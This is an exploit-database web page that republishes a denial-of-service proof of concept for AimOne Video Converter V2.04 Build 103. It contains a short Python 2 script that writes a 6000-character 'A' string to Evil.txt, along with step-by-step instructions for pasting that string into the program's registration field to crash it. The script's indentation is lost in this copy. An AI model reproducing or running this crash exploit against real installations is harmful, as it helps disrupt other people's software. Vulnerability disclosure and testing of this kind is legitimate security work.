Advertisement






AimOne Video Converter V2.04 Build 103 Denial of Service Exploit

CVE Category Price Severity
CWE-399 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2022-12-31
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022120050

Below is a copy:

AimOne Video Converter V2.04 Build 103 Denial of Service Exploit
# Exploit Title: AimOne Video Converter V2.04 Build 103 Denial of Service Exploit
# Date: 30.12.2022
# Vendor Homepage:www.aimonesoft.com
# Software Link:  https://aimone-video-converter.software.informer.com/download/#downloading
# Exploit Author: Achilles
# Tested Version: v2.04
# Tested on: Windows 7 x64
#            


# 1.- Run python code :AimOne.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AimOne Video Converter and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'Name and Code'
# 5.- Click 'OK' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.